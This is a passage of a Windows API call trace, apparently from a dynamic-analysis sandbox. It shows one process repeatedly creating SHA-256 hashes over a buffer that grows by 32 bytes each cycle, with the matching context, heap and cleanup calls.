	[0201.729] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.729] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.729] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.729] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0201.729] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.729] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310d98
	[0201.729] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2310d98, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2310d98, pdwDataLen=0x129424) returned 1
	[0201.729] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.729] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.729] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.730] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.730] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0201.730] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.730] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310dc0
	[0201.730] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x2310dc0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2310dc0, pdwDataLen=0x129424) returned 1
	[0201.730] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.730] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.730] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.730] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.730] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0201.730] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.730] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263898
	[0201.730] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x263898, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x263898, pdwDataLen=0x129424) returned 1
	[0201.730] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.730] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.730] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.731] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.731] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0201.731] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.731] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263618
	[0201.731] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x263618, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x263618, pdwDataLen=0x129424) returned 1
	[0201.731] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.731] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.731] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.731] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.731] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0201.731] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.731] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c368
	[0201.731] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x230c368, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x230c368, pdwDataLen=0x129424) returned 1
	[0201.731] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.731] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.731] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.732] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.732] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0201.732] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.732] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c8c50
	[0201.732] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c8c50, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c8c50, pdwDataLen=0x129424) returned 1
	[0201.732] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.732] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.732] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.732] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.732] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0201.732] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.732] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c8c78
	[0201.732] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c8c78, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c8c78, pdwDataLen=0x129424) returned 1
	[0201.732] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.733] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.733] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.733] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.733] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0201.733] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.733] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c8ca0
	[0201.733] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c8ca0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c8ca0, pdwDataLen=0x129424) returned 1
	[0201.733] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.733] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.733] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.733] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.733] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0201.733] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.734] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c8cc8
	[0201.734] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c8cc8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c8cc8, pdwDataLen=0x129424) returned 1
	[0201.734] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.734] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.734] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.734] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.734] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0201.734] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.734] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c8cf0
	[0201.734] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c8cf0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c8cf0, pdwDataLen=0x129424) returned 1
	[0201.734] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.734] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.734] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.735] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.735] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0201.735] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.735] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c8d18
	[0201.735] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c8d18, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c8d18, pdwDataLen=0x129424) returned 1
	[0201.735] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.735] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.735] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.735] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.735] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0201.735] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.735] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c8d40
	[0201.735] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c8d40, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c8d40, pdwDataLen=0x129424) returned 1
	[0201.735] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.735] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.735] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.736] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.736] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0201.736] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.736] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c8d68
	[0201.736] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c8d68, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c8d68, pdwDataLen=0x129424) returned 1
	[0201.736] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.736] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.736] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.736] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.736] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0201.736] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.736] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c8d90
	[0201.736] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c8d90, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c8d90, pdwDataLen=0x129424) returned 1
	[0201.736] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.736] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.736] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.737] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.737] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0201.737] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.737] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c8db8
	[0201.737] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c8db8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c8db8, pdwDataLen=0x129424) returned 1
	[0201.737] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.737] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.737] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.737] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.737] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0201.737] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.737] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c8de0
	[0201.737] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c8de0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c8de0, pdwDataLen=0x129424) returned 1
	[0201.737] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.737] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.737] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.738] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.738] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0201.738] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.738] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c8e08
	[0201.738] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c8e08, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c8e08, pdwDataLen=0x129424) returned 1
	[0201.738] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.738] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.738] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.738] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.738] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0201.738] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.738] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c8e30
	[0201.738] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c8e30, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c8e30, pdwDataLen=0x129424) returned 1
	[0201.738] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.738] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.738] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.739] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.739] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0201.739] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.739] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c8e58
	[0201.739] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c8e58, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c8e58, pdwDataLen=0x129424) returned 1
	[0201.739] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.739] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.739] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.739] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.739] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0201.739] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.739] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c8e80
	[0201.739] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c8e80, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c8e80, pdwDataLen=0x129424) returned 1
	[0201.739] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.740] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.740] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.740] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.740] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0201.740] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.740] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c8ea8
	[0201.740] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c8ea8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c8ea8, pdwDataLen=0x129424) returned 1
	[0201.740] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.740] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.740] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.741] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.741] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0201.741] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.741] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c8ed0
	[0201.741] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c8ed0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c8ed0, pdwDataLen=0x129424) returned 1
	[0201.741] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.741] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.741] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.741] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.741] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0201.741] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.741] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c8ef8
	[0201.741] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c8ef8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c8ef8, pdwDataLen=0x129424) returned 1
	[0201.741] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.741] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.741] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.742] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.742] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0201.742] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.742] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c8f20
	[0201.742] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c8f20, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c8f20, pdwDataLen=0x129424) returned 1
	[0201.742] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.742] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.742] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.742] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.742] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0201.742] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.742] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c8f48
	[0201.742] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c8f48, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c8f48, pdwDataLen=0x129424) returned 1
	[0201.742] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.742] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.742] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.743] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.743] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0201.743] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
